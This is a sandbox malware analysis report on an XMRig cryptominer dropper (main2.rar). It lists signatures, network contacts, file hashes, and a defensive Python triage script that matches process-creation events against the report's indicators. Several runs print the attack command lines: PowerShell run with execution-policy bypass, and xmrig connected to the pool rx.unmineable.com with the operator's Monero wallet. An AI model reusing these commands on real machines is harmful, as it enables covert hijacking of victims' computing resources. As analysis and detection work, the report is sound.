Malware Analysis Report

2025-04-19 15:37

Sample ID 240522-ytv8vseg37
Target main2.rar
SHA256 08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b
Tags
xmrig execution miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK (Enterprise Matrix V15)

Analysis: static1 (Detonation Overview, Signatures)

Behavioral analyses, each with Detonation Overview, Command Line, Signatures, Processes, Network and Files, in report order: behavioral6, behavioral20, behavioral25, behavioral31, behavioral13, behavioral9, behavioral22, behavioral7, behavioral8, behavioral21, behavioral23, behavioral3, behavioral10, behavioral19, behavioral28, behavioral14, behavioral30, behavioral1, behavioral16, behavioral17, behavioral24, behavioral4, behavioral18, behavioral27, behavioral5, behavioral11, behavioral12, behavioral15, behavioral26, behavioral29, behavioral32, behavioral2

Analysis Overview

score
10/10

SHA256

08f3805606e1d457ed9e80b975bee0320651e3d5626e9e7cb896fd45e8fd0f7b

Threat Level: Known bad

The file main2.rar was found to be: Known bad.

Malicious Activity Summary

xmrig execution miner

XMRig Miner payload

xmrig

Blocklisted process makes network request

Executes dropped EXE

Command and Scripting Interpreter: PowerShell

Suspicious behavior: LoadsDriver

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-22 20:05

Signatures

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:39

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1776s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
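
The xmrig command line above carries everything a responder needs to attribute the campaign: the pool (`-o stratum+ssl://rx.unmineable.com:443`, stratum over TLS on the HTTPS port), the unMineable user format `COIN:ADDRESS.worker` (`-u XMR:<wallet>.unmineable_worker_vilqtiac`), and the algorithm (`-a rx`, RandomX). The following is an added example, not part of the sandbox report, that pulls those fields out of process-creation events and scores the launch against the IOCs in this report. The two malicious sample events copy the Processes entries above; the PIDs 4324 and 2096 are an assumption taken from the memory-dump file names in the Files section, the SHA256 is the dropped xmrig.exe hash from the report, and the gcc event is a constructed benign control for the `-o` flag.

```python
"""Triage process-creation events for XMRig-style miner launches.

Added example for this report; it is not the sandbox's own code. Sample
events are constructed from the report's Processes and Files sections.
"""
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlsplit

# IOCs taken from this report (dropped miner binary, pool host).
REPORT_XMRIG_SHA256 = "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"
REPORT_POOL_HOSTS = {"rx.unmineable.com"}


def _opt(short: str, long: str):
    """xmrig accepts short or long option names, with '=' or whitespace before the value."""
    return re.compile(rf"(?:^|\s)(?:{short}|{long})(?:=|\s+)(?P<val>\S+)", re.I)


POOL_RE = _opt("-o", "--url")
USER_RE = _opt("-u", "--user")
ALGO_RE = _opt("-a", "--algo")
STRATUM_SCHEMES = {"stratum", "stratum+tcp", "stratum+ssl", "stratum+tls"}
TLS_SCHEMES = {"stratum+ssl", "stratum+tls"}
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


@dataclass
class MinerFinding:
    pid: int
    image: str
    pool_host: Optional[str]
    pool_port: Optional[int]
    tls: bool
    algo: Optional[str]
    coin: Optional[str]
    wallet: Optional[str]
    worker: Optional[str]
    reasons: list = field(default_factory=list)


def split_user(user: str):
    """Split an xmrig -u value into (coin, wallet, worker).

    unMineable uses COIN:ADDRESS.worker (as in this report); most other pools
    use ADDRESS[.worker][+difficulty]. The difficulty suffix is discarded.
    """
    coin = None
    if ":" in user:
        coin, user = user.split(":", 1)
    user = user.split("+", 1)[0]
    wallet, _, worker = user.partition(".")
    return coin, wallet or None, worker or None


def parse_miner_cmdline(pid: int, image: str, cmd: str,
                        sha256: Optional[str] = None) -> Optional[MinerFinding]:
    """Return a finding if the command line points a stratum client at a pool, else None."""
    m = POOL_RE.search(cmd)
    if not m:
        return None
    url = urlsplit(m.group("val"))
    if url.scheme not in STRATUM_SCHEMES:
        return None  # '-o' is also gcc's/curl's output flag; require a stratum URL
    try:
        port = url.port
    except ValueError:
        port = None
    u = USER_RE.search(cmd)
    coin, wallet, worker = split_user(u.group("val")) if u else (None, None, None)
    a = ALGO_RE.search(cmd)
    f = MinerFinding(pid, image, url.hostname, port, url.scheme in TLS_SCHEMES,
                     a.group("val") if a else None, coin, wallet, worker)
    f.reasons.append(f"stratum pool URL on command line: {m.group('val')}")
    if f.tls and port == 443:
        f.reasons.append("stratum over TLS on 443 blends with HTTPS egress; "
                         "match on the DNS name or SNI, not the port")
    if url.hostname in REPORT_POOL_HOSTS:
        f.reasons.append(f"pool host {url.hostname} is an IOC from this report")
    if TEMP_DIR_RE.search(image):
        f.reasons.append("miner executed from the user's Temp directory (dropped EXE)")
    if sha256 and sha256.lower() == REPORT_XMRIG_SHA256:
        f.reasons.append("image SHA256 matches the dropped xmrig.exe in this report")
    if f.algo and f.algo.lower().startswith("rx"):
        f.reasons.append("RandomX algorithm selected (Monero)")
    return f


def triage(events):
    """Run every process-creation event through the parser; return only hits."""
    hits = []
    for e in events:
        f = parse_miner_cmdline(e["pid"], e["image"], e["cmd"], e.get("sha256"))
        if f:
            hits.append(f)
    return hits


# Constructed sample events mirroring the report's process tree (PIDs assumed from dump names).
SAMPLE_EVENTS = [
    {"pid": 4324, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"'},
    {"pid": 2096, "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
     "sha256": REPORT_XMRIG_SHA256,
     "cmd": r'"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x'},
    {"pid": 5100, "image": r"C:\msys64\mingw64\bin\gcc.exe", "cmd": "gcc -o main main.c"},  # benign control
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"pid={hit.pid} pool={hit.pool_host}:{hit.pool_port} tls={hit.tls} "
              f"coin={hit.coin} worker={hit.worker} wallet={hit.wallet}")
        for r in hit.reasons:
            print("  -", r)
```

The wallet and worker strings are the pivot for attribution: the same `XMR:45aH...fKxdF.unmineable_worker_vilqtiac` pair appears in every behavioral run of this report, so a hunt across process-creation telemetry for that wallet links every infected host to this operator regardless of where the miner was dropped. The report's AdjustPrivilegeToken rows are a second host-side hook: XMRig requests SeLockMemoryPrivilege to back RandomX's dataset with large pages, and a binary in a user Temp directory asking for that privilege is rarely benign.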

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 211.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp

Files

memory/4324-2-0x00007FFFCCAA3000-0x00007FFFCCAA4000-memory.dmp

memory/4324-5-0x00000145B04D0000-0x00000145B04F2000-memory.dmp

memory/4324-7-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

memory/4324-9-0x00000145B0600000-0x00000145B0676000-memory.dmp

memory/4324-10-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vrc3yewt.435.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4324-25-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

memory/4324-29-0x00007FFFCCAA3000-0x00007FFFCCAA4000-memory.dmp

memory/4324-30-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

memory/4324-31-0x00007FFFCCAA0000-0x00007FFFCD48C000-memory.dmp

memory/4324-51-0x00000145B03F0000-0x00000145B0402000-memory.dmp

memory/4324-64-0x0000014597F20000-0x0000014597F2A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2096-93-0x000001B756F50000-0x000001B756F70000-memory.dmp

memory/2096-94-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-95-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-96-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-97-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-98-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-99-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-100-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-101-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-102-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-103-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-104-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-105-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-106-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-107-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-108-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-109-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-110-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-111-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-112-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-113-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-114-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-115-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-116-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-117-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-118-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-119-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-120-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-121-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-122-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-123-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-124-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-125-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-126-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-127-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-128-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-129-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-130-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-131-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-132-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-133-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-134-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-135-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-136-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-137-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-138-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-139-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-140-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-141-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-142-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-143-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-144-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-145-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-146-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-147-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-148-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-149-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-150-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-151-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-152-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-153-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-154-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-155-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

memory/2096-156-0x00007FF79CD00000-0x00007FF79D933000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:44

Platform

win11-20240508-en

Max time kernel

1789s

Max time network

1747s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2172-0-0x00007FFD4C3B3000-0x00007FFD4C3B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qlrn1v3i.enf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2172-9-0x000002BFBD6C0000-0x000002BFBD6E2000-memory.dmp

memory/2172-10-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp

memory/2172-11-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp

memory/2172-12-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp

memory/2172-14-0x000002BFBD750000-0x000002BFBD762000-memory.dmp

memory/2172-15-0x000002BFBD740000-0x000002BFBD74A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3736-46-0x0000020E2B0C0000-0x0000020E2B0E0000-memory.dmp

memory/3736-47-0x0000020E2CA00000-0x0000020E2CA20000-memory.dmp

memory/3736-48-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/2172-49-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp

memory/3736-53-0x0000020EBF5F0000-0x0000020EBF610000-memory.dmp

memory/3736-50-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-52-0x0000020E2CA20000-0x0000020E2CA40000-memory.dmp

memory/2172-51-0x00007FFD4C3B3000-0x00007FFD4C3B5000-memory.dmp

memory/2172-54-0x00007FFD4C3B0000-0x00007FFD4CE72000-memory.dmp

memory/3736-55-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-56-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-57-0x0000020E2CA20000-0x0000020E2CA40000-memory.dmp

memory/3736-58-0x0000020EBF5F0000-0x0000020EBF610000-memory.dmp

memory/3736-59-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-60-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-61-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-62-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-63-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-64-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-65-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-66-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-67-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-68-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-69-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-70-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-71-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-72-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-73-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-74-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-75-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-76-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-77-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-78-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-79-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-80-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-81-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-82-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-83-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-84-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-85-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-86-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-87-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-88-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-89-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-90-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-91-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-92-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-93-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-94-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-95-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-96-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-97-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-98-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-99-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-100-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-101-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-102-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-103-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-104-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-105-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-106-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-107-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-108-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-109-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-110-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-111-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-112-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-113-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-114-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-115-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-116-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

memory/3736-117-0x00007FF6B36B0000-0x00007FF6B42E3000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-22 20:05

Reported

2024-05-22 20:47

Platform

win11-20240426-en

Max time kernel

1793s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 249.197.17.2.in-addr.arpa udp

Files

memory/2948-0-0x00007FF9FFFB3000-0x00007FF9FFFB5000-memory.dmp

memory/2948-2-0x0000018B61F30000-0x0000018B61F52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lqjcyyh5.cxk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2948-10-0x00007FF9FFFB0000-0x00007FFA00A72000-memory.dmp

